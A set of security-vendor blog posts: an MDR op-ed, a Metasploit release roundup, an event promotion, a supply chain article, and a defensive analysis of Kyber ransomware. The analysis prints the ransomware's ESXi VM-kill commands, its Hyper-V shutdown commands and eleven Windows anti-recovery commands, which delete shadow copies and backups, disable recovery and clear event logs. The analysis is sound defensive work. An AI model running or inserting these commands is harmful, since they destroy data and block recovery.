My own view on this has been shaped by more than one experience. In one case, our MSSP was part of a defence company that was later carved out into a separate business. The service was built around a legacy SIEM. They had plenty of interest elsewhere in automation and future-state capability, but the fundamentals were being missed. We could talk about what we wanted to automate, but not with enough confidence about the quality of the underlying visibility, the operational process around it, or how the service was supposed to mature over time.

In another case, the issue was an MSSP overlay wrapped around a well-known, high-cost log indexer. On paper, that should have been a strong foundation. In practice, the management layer around it was poor. There was a lack of expertise, no credible roadmap, and very little meaningful tuning. As the MSSP was also reselling the ingest, there was no obvious incentive to optimize data use in the customer’s favour. Ingest was capped because of cost, retention was limited to 90 days, and we were left with the uncomfortable combination of high spend, constrained visibility, and a service that did not appear to be improving in any meaningful way.

Those experiences shaped how I think about MDR because they exposed the same underlying problem. The technology was not absent, but the service model around it was weak. When the gap between the platform and the service becomes too wide, the customer ends up paying for capability in theory while carrying the operational risk in practice.

Why the gap between platform and service matters

This is where many MDR relationships start to fail. Even when the tooling is capable, the provider still has to connect platform, people, process, and commercial model into one coherent service. If that does not happen, the customer ends up living with support issues, awkward hand-offs, misaligned contracts, unclear accountability, and a constant sense that there are too many moving parts and not enough ownership.

That is why I would start any MDR evaluation by looking at how the relationship is meant to work in practice. 

  • Does the provider genuinely own the experience end to end, or are they effectively brokering one element through another?

  • Can they show how the programme will improve over the first year, not just how onboarding works in the first month?

  • Do they understand the rest of your security ecosystem and how to operate within it, or do they assume every answer involves expanding their footprint?

Strong providers think holistically. They understand that the customer already has an environment to manage, existing tools to work with, and internal teams who need clarity rather than additional friction. They think in terms of operating model, monitoring, response, and continuous improvement over time, rather than treating the service as a thin wrapper around a platform. That is usually where the difference between coverage and real partnership becomes obvious.

Proactive defense starts with the fundamentals

True partnership is defined by its ability to deliver proactive defense and continuous improvement. By this, I do not just mean threat hunting or faster triage. I mean exposure reduction in the broader sense. It is understanding attack paths, using intelligence well, tuning detections properly, improving visibility where it matters, and building a service rhythm that reduces the conditions attackers rely on.

That sounds obvious, but it is surprisingly easy for organisations to be distracted from those fundamentals. Low entry prices often mask a fundamentally constrained operating model, shifting risk and cost back to the customer. 

Sweeping promises about single digit alert volumes should be treated carefully, especially before a provider has properly understood the environment. The same is true of broad agentic AI claims. Automation can absolutely help, but it does not replace accountability, operational judgement, or the need for a provider to show how the service will improve over time.

For me, that last point is one of the clearest tests of whether the relationship is working. An MDR service should not be something you set and forget. A mature partnership should look better in month twelve than it did in month one. Visibility should improve. Tuning should improve. The roadmap should improve. Confidence in escalation and response should improve. If none of that is happening, it becomes very difficult to describe the relationship as a real partnership. At that point, you may simply have outsourced a queue.

When displacement becomes the right answer

That is also how I think about displacement. An incumbent should not be displaced simply because another provider has a sharper demo or a more fashionable story. Displacement makes sense when the existing model has stopped improving, when the service feels static or opaque, when the team lacks the expertise to tune and evolve it properly, or when the commercial structure and delivery model are working against the customer rather than with them.

If the relationship is held together by workarounds, if there is no meaningful roadmap, or if the customer is left carrying too much of the integration and governance burden themselves, the problem is usually structural rather than temporary. In that situation, the question is no longer whether the service can be tweaked around the edges. The question is whether the model is fit for purpose at all.

Consolidation is only useful if it improves the model

That does not automatically mean consolidation is the answer. Consolidation can be valuable, but only when it improves the operating model rather than simply reducing the number of logos in the environment. In some cases, the right answer will be to build a broader relationship with a provider that has earned trust and shown it can deliver more. In others, the right answer will be better integration and a clearer division of responsibilities.

What matters is whether the provider helps create a more coherent, scalable, and accountable way of operating. If consolidation leads to better hand-offs, stronger accountability, and a simpler way of reducing risk, it can be very valuable. If it does not, then consolidation is not the point. A better operating model is.

This broader view is also consistent with established security guidance. NIST CSF 2.0 frames cybersecurity as a risk management discipline across governance, protection, detection, response, and recovery [1]. NIST’s latest incident response guidance reinforces that response should be integrated into wider risk management and improved over time [2]. The NCSC makes a similar point in its guidance on building a SOC and on security monitoring, where tools, skills, and operating model all need to work together [3]. CISA’s exposure reduction guidance points in the same direction by focusing on reducing the conditions attackers rely on before incidents escalate [4].

Questions worth asking any MDR provider

There are a few practical questions I would encourage any CISO, Security Director, or Security Operations Manager to ask, whether they are reviewing an incumbent or evaluating a new provider:

  • How will the service improve over the first year and beyond?

  • Where do the hand-offs happen between your platform, your analysts, and my team?

  • How do you work with the security and IT tools we already rely on?

  • How predictable is the commercial model as coverage expands?

  • What are you doing to reduce risk before the next incident, not just respond after it?

  • If your commercial model benefits from more ingest, what incentive do you have to tune it down?

Those questions reveal far more than a polished demo ever will.

Ultimately, the organisations that get the most value from MDR tend to be the ones that treat it as part of a wider security partnership rather than a neatly outsourced function. They expect transparency, progress, and a provider that understands both the environment they have today and the operating model they are trying to build over time. That is the standard worth holding. If the provider is not improving the programme over time, you do not have a real partnership. And if consolidation does not lead to a better operating model, it is probably not worth doing in the first place.

Learn more about Rapid7's approach to preemptive MDR.

Alan Simpson is Field CISO for the UK and Ireland at Rapid7, advising CISOs and senior leaders on cyber risk, resilience, and security strategy that supports business outcomes. Before joining Rapid7, he served as Global Security Operations Manager and Acting CISO at Keyloop, where he led security operations and wider information security initiatives. He has also held senior security leadership roles at Allianz and LV=, with experience across security operations, incident response, architecture, awareness, supplier assurance, and security testing.

[1] https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf

[2] https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.pdf

[3] https://www.ncsc.gov.uk/collection/building-a-security-operations-centre

[4] https://www.cisa.gov/resources-tools/resources/exposure-reduction

Metasploit Wrap-Up 04/25/2026

24 April 2026 at 16:17

Check Method Visibility

Metasploit has supported check methods for many years now. It’s not always desirable to jump straight into exploiting a vulnerability but instead to determine if the target is vulnerable. Metasploit tries to be very conservative with classifying a target as “vulnerable” unless the vulnerability is leveraged as part of the check method, reserving the “appears” status for version checks. The different check codes a module is capable of returning and the logic to select among them varies from exploit to exploit and is not always the easiest to understand. Aligning with the consistent feedback that Metasploit has received that module actions should be more transparent, adfoster-r7 has been adding reasoning information en masse to the check codes returned by a variety of exploits. This information will help users understand why a particular vulnerability status was determined, making troubleshooting efforts easier and increasing confidence in the results.

Legacy SMB Improvements

This week, community member g0tm1lk made multiple improvements for legacy and non-Windows SMB targets. Version information is now more reliably extracted from targets running SMB 1, and a variety of minor bugs were fixed across multiple modules that would have affected users targeting systems the module was not intended to target as is often the case when the module is used to scan an entire network.

New module content (4)

Camaleon CMS Directory Traversal CVE-2024-46987

Authors: Goultarde, Peter Stockli, and bootstrapbool

Type: Auxiliary

Pull request: #21122 contributed by bootstrapbool

Path: gather/camaleon_download_private_file

AttackerKB reference: CVE-2024-46987

Description: This adds an auxiliary module to exploit an arbitrary file vulnerability, CVE-2024-46987, on Camaleon CMS >= 2.8.0 as well as 2.9.0.

Langflow RCE

Authors: Takahiro Yokoyama and weblover12

Type: Exploit

Pull request: #21260 contributed by Takahiro-Yoko

Path: multi/http/langflow_rce_cve_2026_27966

AttackerKB reference: CVE-2026-27966

Description: Adds exploit module for CVE-2026-27966, a prompt injection RCE vulnerability in Langflow < 1.8.0. By creating and sending a specially-crafted flow containing python code, the LangChain will execute that code because LangChain's Read-Eval-Print Loop (REPL) is exposed by default and runs any Python code it is given.

WebDAV PHP Upload

Authors: g0tmi1k and theLightCosine theLightCosine@metasploit.com

Type: Exploit

Pull request: #21256 contributed by g0tmi1k

Path: multi/http/webdav_upload_php

AttackerKB reference: CVE-2012-10062

Description: Updates code and adds features: Linux support, check() method, and cleanup after exploit.

Linux Chmod

Author: bcoles bcoles@gmail.com

Type: Payload (Single)

Pull request: #21238 contributed by bcoles

Path: linux/loongarch64/chmod

Description: Adds a new linux/loongarch64/chmod payload to change the permissions of a specified file.

Enhancements and features (11)

  • #21019 from g0tmi1k - This adds support for phpMyAdmin v3.1.x to the phpMyAdmin Config File Code Injection module (CVE-2009-1285). This also adds a check method.
  • #21230 from bcoles - Reduces the memory footprint of the module metadata cache in Metasploit.
  • #21231 from bcoles - Improves the performance of the module metadata cache as well as bug fixes.
  • #21232 from bcoles - Add a method to discover writable directories on Unix targets using the find command.
  • #21256 from g0tmi1k - Updates code and adds features: Linux support, check() method, and cleanup after exploit.
  • #21347

Bugs fixed (4)

  • #21327 from tair-m - Fixes a crash when loading HTTP modules.
  • #21341 from g0tmi1k - This fixes multiple issues related to various SMB modules when targeting Samba.
  • #21344 from adfoster-r7 - Fixes a bug when running the check method for scanner/http/elasticsearch_traversal against non-vulnerable targets.
  • #21346 from adfoster-r7 - Fixes a false positive that was present in auxiliary/scanner/couchdb/couchdb_enum.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

3 Reasons to Attend our Global Cybersecurity Summit if you’re Focused on AI, Threats, and CTEM

24 April 2026 at 09:07

Security teams are dealing with a different kind of pressure now. It is not just the volume of alerts or the pace of attacks, but also the gap between what teams can see and what they can act on with confidence.

That gap shows up in different ways. Threats move across identity and cloud in ways that are difficult to track, exposure data exists but often sits disconnected from response, and AI is being introduced into workflows without a clear role in decision-making.

This year’s Rapid7 Global Cybersecurity Summit brings those threads together as part of the same operational solution.

1. You need a clearer view of how attacks actually unfold

A lot of detection strategies still assume attacks follow a clean path. In practice, they do not. They start in one place, move quickly, and often rely on small gaps rather than obvious failures.

Sessions like The Reality of Running a SOC in 2026 break this down in detail, looking at how attacks begin with things like identity misuse or cloud misconfiguration, then evolve as defenders try to keep up. That matters because it changes how detection should be designed. Coverage alone is not enough if teams do not have the context created by strong exposure management to interpret what they are seeing.

That same idea carries into Inside the Modern SOC, where a real investigation is followed from first alert to outcome. It is a useful reminder that detection is only part of the problem.Deciding how to respond, and doing it quickly, is the critical next step.

2. Exposure only matters if it connects to action

Most teams already have some form of exposure management in place. The challenge is making it useful. A long list of vulnerabilities does not help much if it is not tied to how risk actually shows up in the environment.

Sessions like Beyond the Vulnerability List and From Cloud Exposure to Runtime Attack focus on that connection. They look at how exposures turn into active threats, often before any alert is triggered, and how teams can use that information to prioritize earlier.

Here’s the part people miss. Exposure is not just about knowing what is wrong. It is about understanding what matters now, based on how the environment is being used and how attackers are likely to move through it.

3. AI is only useful if it improves decisions

AI is already part of most security conversations, but the reality is nuanced. In some cases it helps reduce noise and speed up investigations. In others, it creates new questions around trust and transparency.

The AI Dilemma: Automating Defense Without Surrendering Judgment tackles this directly. It looks at where AI is helping in real SOC workflows, where it can get in the way, and why explainability matters if teams are going to rely on it. The discussion is grounded in how analysts actually work, not just what the technology promises.

There is also a broader point here. Attackers are using AI as well, which means the balance between speed and accuracy is becoming more important on both sides.

Join the conversation

Across these sessions, the common doesn’t stem from any single technology. It is how teams connect signals, context, and decisions in a way that holds up under pressure, which shows up in how threats are understood, how exposure is prioritized, and how AI is applied. It is also why the summit is structured the way it is, moving from shared context on day one into more focused, role-based sessions on day two.

More sessions and speakers will be added in the coming weeks, but the direction is already clear. Security operations are shifting toward earlier decisions, better prioritization, and fewer assumptions.

If your work touches AI, threat detection, or exposure management, this is where those conversations start to come together.

Join us May 12–13 and see how teams are approaching it in practice.

Register now.

AI is Changing Vulnerability Discovery and your Software Supply Chain Strategy has to Change with it

23 April 2026 at 09:25

Wade Woolwine is Senior Director, Product Security at Rapid7.

The headlines around Glasswing have focused on how quickly AI can surface vulnerabilities, which has naturally caught the attention of security leaders. In my conversations with teams and customers, the more useful discussion has been about what that speed means in practice for business protection, especially across open source risk, dependency choices, and software supply chain resilience. The deeper issue for security leaders sits elsewhere. 

Software risk is becoming harder to manage across the full lifecycle, especially in open source dependencies, build pipelines, developer environments, and the operational processes that sit between disclosure and remediation. When vulnerabilities can be found faster and at greater depth, security teams need more than another source of findings. They need a stronger way to understand what they run, what they trust, what they can patch quickly, and where a single weak dependency can create disproportionate risk.

Faster discovery makes software supply chain resilience a more immediate leadership issue. CISOs need a clearer view of how dependencies are chosen, monitored, validated, and governed across production, build, and developer environments, especially as open source remains essential to modern software development.

Organizations already struggle to absorb vulnerability disclosures at the pace they are coming in, because when discovery gets faster, the operational gap widens between knowing there is a problem and being able to do something useful about it. That gap is especially serious in the software supply chain, where a single dependency can introduce risk into build systems, production workloads, developer endpoints, and the tools used to secure them.

This is why I would frame AI-driven vulnerability discovery risk as a lifecycle challenge. The pressure does not sit in one place, but across inventory, dependency decisions, threat intelligence, patching discipline, and validation – with people, process, and visibility shaping how well an organization can respond. Technology matters, but it cannot compensate for a weak operating model underneath it.

Open source still matters. Dependency choices matter more.

Open source remains essential to modern software development because it helps teams move faster and get products to market without rebuilding common functionality from scratch. The better response is to be more deliberate about where and how third-party code enters the environment. 

Open source has always involved a trade-off between speed, efficiency, flexibility, and inherited risk, and that trade-off becomes harder to manage as AI makes code review deeper and faster. More flaws and supply chain compromises will likely be found in packages that teams have trusted for years, including transitive dependencies most developers did not knowingly choose. One only needs to look back a few weeks to find that the widely used Axios package suffered a supply chain compromise that bundled a Remote Access Trojan (RAT) charged with stealing secrets. That raises the value of understanding which dependencies are essential, which ones can be removed, which ones pull in large chains of transitives, and which ones are maintained by too few people to inspire confidence.

That work starts with a more disciplined question than “Is there a package that does this?” It starts with “Do we need this dependency, and do we understand the risk that comes with it?” The safest dependency is often the one that never enters the environment in the first place.

Why inventory has to go deeper than package lists

Supply chain resilience begins with knowing what you are actually running, which sounds straightforward until a critical disclosure lands in a package no one realized was in the environment three layers deep. Dependency graphs are deeper than most teams think, and transitive risk is where a lot of operational pain begins. A package chosen directly by a developer may bring in dozens of additional packages, each with its own maintainers, release cadence, security posture, and potential failure points.

A mature approach to inventory needs to move beyond a static package list, because CISOs need confidence in three views at once: What is declared in source, what is resolved and built, and what is actually running in production? Those views often drift apart over time, which means a package can be patched in source and still remain unpatched in a deployed container or runtime environment. An SBOM on its own will not close that gap; continuous, usable inventory will.

That inventory also needs clear ownership attached to it, because the moment a critical dependency is identified, someone has to decide what happens next, coordinate the change, and absorb the operational consequences. Security teams cannot do that well if responsibility is unclear, which is why ownership needs to be treated as part of resilience rather than an administrative detail.

Build pipelines and developer environments deserve the same scrutiny as production

Supply chain conversations still tend to start with production systems, even though recent incidents have shown how quickly compromise can move through the build layer, developer tooling, or the security tooling inside the pipeline itself. Those environments hold code, secrets, and trust relationships that attackers know how to exploit, while developer workstations often carry a rich mix of credentials and elevated privileges because speed matters to the business. Build systems are predictable and privileged, which makes them both valuable and vulnerable, but also easier to monitor.

Seeing those layers as part of the same attack surface means asking harder questions about how code enters the build, how package updates are governed, how actions and dependencies are pinned, what secrets exist in CI/CD, and what controls are in place on developer endpoints to detect anomalous behavior or stop high-risk package activity before it goes unnoticed.

You can gauge the maturity of the operating model with the answers to a few basic questions:

  • How tightly are dependencies controlled in CI?

  • How are package lifecycle scripts governed?

  • What secrets exist in CI/CD, and what protections surround them?

  • What visibility exists into anomalous behavior on developer endpoints?

  • How would the team detect or prevent high-risk package activity before it spreads?

If those answers are unclear, important parts of the model are still missing.

Why prioritization matters more as scanning accelerates

When software risk rises, the instinct is often to add another scanner because more visibility feels like progress. What matters more over time, though, is how well teams can prioritize the findings that follow, assign them to the right owner, choose the right mitigation, and prove that exposure actually went down. Broader scanning and faster discovery mostly add to the pile unless the operating model behind them is strong enough to turn findings into action. Feed more issues into a process that is already stretched and the backlog grows, priorities become harder to sort, and remediation slows in the places where speed matters most. The organizations that come through this period well will be the ones that treat supply chain resilience as a systems problem, with stronger intake, clearer governance, better intelligence, and faster paths from alert to action.

What stronger software supply chain resilience looks like in practice

A stronger response starts with a deeper inventory of dependencies across source, build, and runtime, so teams can see both direct and transitive packages and connect them back to real environments and real owners. Once that picture is in place, intelligence monitoring becomes far more useful when it runs continuously against credible signals on vulnerabilities, package risk, maintainer health, end-of-life software, and unusual changes in dependency behavior.

The same level of care needs to carry through into dependency governance, where better decisions depend on asking whether a new package is necessary, how much transitive risk it introduces, whether its maintenance model is healthy, and what policy governs its path into production. Build and developer controls belong in that same conversation, because version pinning, private registries, secret handling, script restrictions, immutable builds, ephemeral runners, and stronger endpoint monitoring all reduce the attack surface around the software supply chain.

Monitoring threat intelligence for notifications about new vulnerabilities and compromised packages and having a well defined and practiced process for scoping and remediating emerging threats becomes critical. Your supply chain vulnerability and compromise response should be practiced – just like your incident response plan – through table top exercises and simulated threat events. You don’t want to wait until the house is on fire to know how to execute an effective response.

Similarly, Engineering, DevOps, and Security teams should collaborate on establishing a trust and reputation scoring mechanism for supply chain dependencies. Being able to evaluate the speed of response, transparency of communication and updates, and ultimate resolution of the vulnerability or compromise speak volumes for how much you can trust the maintainers of the software you depend on. The OpenSSF Scorecard project offers a great place to start evaluating the open source packages you’re already using.

Organizations should also have a fallback plan for when obtaining a security patch is not available. Some options to consider include exploring other open source packages that perform similar functions, exploring other mitigations such as application firewalling, or even forking and contributing a security patch back to the community.

Validation closes the loop by showing whether the artifact came from where it was supposed to, whether the package has drifted in unexpected ways, and whether the mitigations applied are reducing live risk rather than simply documenting the process.

How CISOs should think about the next 12 months

The strain on security teams is only growing, and the potential for AI to relieve some of that pressure is understandably compelling, especially when boards, CEOs, and CFOs are asking how the organization plans to adopt it. That makes this a leadership question as much as a technology one. CISOs need a clear point of view on where AI can genuinely improve resilience, where it still introduces too much uncertainty, and how to explain those choices in business terms.

If software engineering teams are already adopting AI-assisted development, security teams should be part of that conversation early, especially around dependency management. I have seen teams begin connecting AI coding agents to vulnerability management workflows so those agents can interpret vulnerabilities found in the code base, assess reachability with more context, help plan remediation, and validate updates much faster than traditional handoffs usually allow. Used well, that can reduce drag across the workflow and help teams move faster on classes of issues that are currently slowing them down.

Getting there safely still depends on the foundation underneath it. A more resilient path starts with a clearer picture of the environment and a more complete inventory of dependencies across source, build, and runtime. From there, ownership needs to be explicit, threat and vulnerability intelligence needs to be embedded into how the organization prioritizes, and dependency sprawl needs to be reduced with more discipline around what actually enters production. The same mindset should carry through to the build layer and developer endpoints, where tighter controls and better visibility help reduce unnecessary exposure, while faster and more repeatable paths from disclosure to action make it easier for teams to respond before risk compounds.

That foundation will matter regardless of which AI model or platform becomes dominant six or twelve months from now. It will also matter if the next wave of AI makes backlog reduction, lower-tier remediation, or patch validation more practical. Organizations that know what they run and how they operate will be in a much better position to adopt those capabilities with intent.

The shift security leaders should make now

Security in an AI-accelerated world needs to be managed as a systems challenge, with supply chain resilience shaped by how well organizations connect software composition, exposure visibility, dependency governance, threat intelligence, build integrity, endpoint controls, remediation workflows, and validation. When those layers are treated separately, gaps open quickly; when they are tied together through a stronger operating model, teams are in a much better position to absorb faster discovery without losing control of the response.

For CISOs, that means continuing to use open source with a more deliberate view of dependency risk, reducing unnecessary packages where possible, knowing what is running and who owns it, and monitoring threat and vulnerability intelligence with enough discipline to act before the queue overwhelms the team. It also means paying closer attention to the attack surface across production, build, and developer environments, while treating AI as something that will amplify both the strengths and the weaknesses already present in the program. Faster discovery is here, and the organizations that handle it best will be the ones that can respond with the same level of discipline.

Kyber Ransomware Double Trouble: Windows and ESXi Attacks Explained

21 April 2026 at 10:38

Overview

For executive leadership, the emergence of Kyber ransomware represents a significant and immediate threat due to its specialized, dual-platform deployment capability targeting mission-critical virtualization infrastructure (VMware ESXi) and core Windows file systems. This cross-platform approach, coupled with effective anti-recovery measures, drastically elevates the risk of a total operational disruption. Organizations should treat Kyber not merely as another ransomware strain, but as a specialized tool capable of causing a complete operational blackout. Recent real-world incidents have demonstrated that this approach can result in large-scale operational impact across enterprise environments.

During a March 2026 incident response engagement, Rapid7 recovered two Kyber ransomware payloads deployed in the same environment, one targeting VMware ESXi infrastructure and the other Windows file servers. This provided a rare opportunity to analyze both variants side by side. In March 2026, Rapid7 recorded over 900 ransomware incidents being publicly reported.

The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces. The Windows variant, written in Rust, includes a self-described “experimental” feature for targeting Hyper-V.

Despite these differences, both samples share a campaign identifier and Tor-based ransom infrastructure, confirming coordinated cross-platform deployment. Notably, the ransomware’s cryptographic claims are not consistent across variants. The ESXi sample advertises “post-quantum” encryption using Kyber1024, but in practice relies on ChaCha8 with RSA-4096 key wrapping, while the Windows variant does implement the advertised hybrid scheme. As usual, ransom notes prove to be more aspirational than accurate.

Kyber is a relatively new ransomware group that has recently gained visibility. Despite this, public technical analysis of the malware remains limited. The lack of spotlight on the group presented an opportunity to share our findings with the community.

Technical analysis

Kyber is a cross-platform ransomware family targeting Linux/ESXi and Windows environments. Both variants share Tor infrastructure and a campaign ID, but differ in programming language they are written, crypto, and features. While both reference the same encryption scheme in their ransom notes, only the Windows variant appears to implement it as described.

Property

ELF (Linux/ESXi)

PE (Windows)

Language

C++, GCC 4.4.7 (2012)

Rust, MSVC 19.36 / VS2022

Actual crypto

ChaCha + RSA-4096

AES-256-CTR + Kyber1024 + X25519

Note claims

AES + X25519 + Kyber

AES + X25519 + Kyber

Extension

.xhsyw

.#~~~

Ransom note

readme.txt

READ_ME_NOW.txt

VM targeting

Native esxcli

PowerShell Get-VM (experimental)

Anti-recovery

None

11 commands (elevation required)

In addition, both variants share a common campaign ID and Tor-based infrastructure, including a negotiation portal and leak site, indicating coordinated operations across platforms.

Campaign ID: 5176[REDACTED]

Tor chat: Mlnmlnnrdhcaddwll4zqvfd2vyqsgtgj473gjoehwna2v4sizdukheyd[.]onion

Tor blog: Kyblogtz6k3jtxnjjvluee5ec4g3zcnvyvbgsnq5thumphmqidkt7xid[.]onion

Chat path: /chat/5176[REDACTED]

Linux/ESXi variant

The Linux/ESXi variant SHA-256: 6ccacb7567b6c0bd2ca8e68ff59d5ef21e8f47fc1af70d4d88a421f1fc5280fc is a 64-bit ELF executable, not stripped, written in C++ and statically linked against OpenSSL 1.0.1e-fips.

The sample was developed to target ESXi environments. As shown in Figure 2, the help text for the required path argument explicitly references the datastore path /vmfs/volumes, the root directory in VMware ESXi hosts where VMFS (Virtual Machine File System) datastores are mounted. The malware also relies on ESXi-native tooling esxcli and targets VMware-specific paths and artifacts.

target-path-binary-help-text-names-vmfs-volumes.png
Figure 1: The binary's help text names /vmfs/volumes as the intended target path.

The execution flow is straightforward:

  1. Parse CLI arguments (path required, size validated 0–100)

  2. Initialize logging (optional)

  3. Optionally enumerate and terminate VMs (vmkill)

  4. Load embedded RSA-4096 public key

  5. Initialize thread pool (capped at 12 threads)

  6. Traverse directories and submit encryption jobs

Background execution

To ensure encryption continues after an SSH session ends, the malware implements a detach flag. When enabled, it forks and exits the parent process, allowing the child to run in the background. The child then calls setsid() to detach from the controlling terminal, avoiding the SIGHUP signal typically sent when a session closes.

This allows the attacker to disconnect safely while encryption of /vmfs/volumes datastores continues uninterrupted in the background.

Targeting VMware

If the vmkill flag is set, the binary enumerates all running VMs before starting encryption. It forks a child process that executes the ESXi-native management command esxcli vm process list, redirecting its output to a temporary file via dup2(). The output is then parsed line by line to extract Display Name and World ID pairs.

If a whitelist is provided via the whitelist argument, matching VMs are skipped. All other VMs are terminated sequentially using esxcli vm process kill type=soft world-id <id>, with the parent process waiting for each shutdown to complete before proceeding.

Two implementation choices stand out here. First, the ransomware uses fork/execlp rather than system(). By calling fork() and then execlp() directly, ransomware developers bypass the shell entirely. This means the arguments are passed as a null-terminated array of strings (argv) directly to the execve system call. If a VM name contained a space or a special character, a system() call might crash or behave unexpectedly, but execlp ensures the command is executed exactly as intended. This suggests the developer is familiar with low-level system programming.

Second, the use of type=soft requests a graceful shutdown rather than a forced termination. This likely reduces the risk of corrupting VM disk state prior to encryption. After issuing shutdown commands, the binary sleeps briefly for about ~2 seconds before continuing, allowing ESXi to complete the operation. 

Directory traversal

The malware performs a recursive directory walk to identify targets. Interestingly enough, it drops a readme.txt ransom note into every folder before the encryption routine begins. The traversal logic does not follow symbolic links, as traversing them can lead to unexpected areas of the filesystem. The sample does not implement an extension allowlist. Files are encrypted unless explicitly excluded.

The binary explicitly ignores files with the following extensions or names:

.xhsyw (already encrypted)
.locksignal, .processing, .cryptdata_backup
.tmp, readme.txt
.sf (VMware System Files)

Figure 2: Confirmed exclusion list from protecting in-progress files, already-encrypted files, and VMware system files from double-processing.

Encryption: marketing vs reality

The ransom note claims that for encryption it uses AES-256-CTR, X25519 and Kyber1024 algorithms. 

Ransom-note-embedded-ELF.png
Figure 3: Ransom note embedded in the ELF binaries claims AES-256-CTR and X25519/Kyber1024 algorithms.

Our technical analysis, however, says otherwise. Decompilation of the core encryption logic shows the cipher is actually ChaCha8. Two indicators support this conclusion. First, in the ECRYPT_encrypt_bytes subroutine (Figure 5) the loop executes 8 rounds (i = 8; i > 0; i -= 2), and the code applies 32-bit right rotations with constants 16, 20, 24, and 25. These correspond to the standard ChaCha left-rotation constants (16, 12, 8, and 7) defined in RFC 8439.

IDA-decompilation-ECRYPT-encrypt-bytes-function.png
Figure 4: IDA decompilation of ECRYPT_encrypt_bytes function

Second, the ECRYPT_keysetup function (Figure 6) uses the "expand 32-byte k" sigma constant. For 256-bit keys, the malware initializes its state by placing this constant in words 0–3 and the key in words 4–11 — mirroring the standard ChaCha layout.

IDA-decompilation-ECRYPT-keysetup-function.png
Figure 5: IDA decompilation of ECRYPT_keysetup function

OpenSSL is statically linked but only handles RSA-4096 key wrapping. We did not find any “post-quantum”. The operator likely just copy-pasted the ransom note from a Windows variant that actually supports Kyber1024.

Partial encryption strategy

Partial encryption logic is size-based encryptFilePartly() function.

  • Files under 1MB: entire file encrypted

  • Files between 1MB and 4MB: first 1MB encrypted

  • Files above 4 MB: only a calculated portion of each file is encrypted, with the proportion controlled by size; the program validates this value as 0–100 in main(), and the default observed setting is 10.

  • This approach significantly reduces encryption time while still rendering large files (e.g., VMDKs) unusable.

Encryption workflow

Each file is encrypted with a unique ChaCha8 key. Before encrypting the file, the binary creates a .locksignal file and renames the original to .processing to prevent concurrency. It then checks the last 535 bytes for a metadata trailer containing the markers KYBER, CDTA, and ATDC. If these are present, the file is skipped as already encrypted.

For new targets, the malware generates a 40-byte key/IV set and wraps it using an embedded RSA-4096 public key. This metadata is appended to the file and verified before encryption begins. A redundant copy is also saved as <file>.cryptdata_backup. Encryption is performed in-place in 1 MB chunks. On success, the file is renamed from .processing to .xhsyw. Any files left with the .processing suffix indicate an interrupted or failed encryption attempt.

Defacing every entry point

Even before encryption, ransomware binary replaces three specific files:

  • SSH Access replaces /etc/motd (Message of the Day), displaying the ransom note immediately to anyone logging in via SSH.

  • Web Management replaces the VMware web UI index pages at both /usr/lib/vmware/hostd/docroot/index.html and the Host Client interface at /usr/lib/vmware/hostd/docroot/ui/index.html.

Whether an administrator logs in via SSH or hits the web management portal, they are immediately met with the ransom note. On non-ESXi systems where these paths don't exist, the rename fails gracefully and execution continues.

Execution-log-from-REMnux-test.png
Figure 6: Execution log from REMnux test: defacement fails gracefully on non-ESXi, encryption proceeds.

Windows variant

The Windows sample SHA-256: 45bff0df2c408b3f589aed984cc331b617021ecbea57171dac719b5f545f5e8d is a 64-bit PE executable written in Rust and compiled with MSVC (VS2022). Much like the ESXi variant, the Windows binary as well is not packed, obfuscated, or even stripped. It retains full Rust panic strings and cargo dependency paths, including the build path C:\Users\user\.cargo\registry\src\index.crates.io-6f17d22bba15001f.

Additionally, the binary’s version flag reveals the project name as win_encryptor 1.0.

Ransomwares-CLI-interface.png
Figure 7: Ransomware's CLI interface

The Windows binary exposes a minimal CLI (Figure 8), requiring the path argument to specify the target directory. It also includes system flag which is self-described as "experimental" and intended to enforce a hard-stop on Hyper-V virtual machines.

Ransomware initializes full runtime initialization, even if invoked with just help flag. It aggregates entropy from four sources: system time, Windows CSPRNG, processor-based entropy via RDRAND, and running process data and producing ~30 KB of randomness to seed an internal AES-CTR DRBG. Unlike typical ransomware, which often relies only on BCryptGenRandom, this strain implements a custom entropy pipeline which suggests the developer cared about key material quality.

After initialization, the binary checks whether it is running with elevated privileges by attempting to acquire SeDebugPrivilege and logs are printed to the console (see Figure 8).

This privilege check determines if the destructive commands will be executed. Without elevation, the binary only does file encryption. With elevation, it unlocks its full toolkit: killing services, modifying the registry, and wiping shadow copies to prevent recovery.

Service termination and anti-recovery

When running with elevated privileges the binary first terminates services matching five patterns: msexchange, vss, backup, veeam, and sql using OpenSCManagerA, EnumServicesStatusA, and ControlService API calls. The malware forces the system locale to en-US before service enumeration. This normalization makes certain that pattern matching for service names remains reliable regardless of the victim's native system language.

It then executes 11 commands via CreateProcessW that you can see in the table below

#

Command

Purpose

1

powershell -ep bypass -nop -c "Get-WmiObject -Class Win32_ShadowCopy \| ForEach-Object { $_.Delete() }"

Delete VSS shadow copies via WMI

2

wmic.exe SHADOWCOPY DELETE /nointeractive

Delete shadow copies via WMIC

3

vssadmin.exe Delete Shadows /all /quiet

Delete shadow copies via vssadmin

4

bcdedit.exe /set {default} recoveryenabled No

Disable Windows Recovery Environment

5

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

Suppress boot failure prompts

6

wbadmin DELETE SYSTEMSTATEBACKUP

Delete system state backups

7

wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest

Delete oldest system state backup

8

iisreset.exe /stop

Stop IIS to release locked web files

9

reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f

Increase SMB concurrent connections

10

for /F "tokens=*" %i in ('wevtutil el') do wevtutil cl "%i"

Clear all Windows event logs

11

rd /s /q C:\$Recycle.Bin

Empty the Recycle Bin

Table 2: 11 commands executed by ransomware if it ran with elevated privilege

Hyper-V shutdown

If system flag is set, the binary enumerates Hyper-V virtual machines via PowerShell before encryption:

Get-VM | select VMId, Name | ConvertTo-Json
Stop-VM -Force -TurnOff

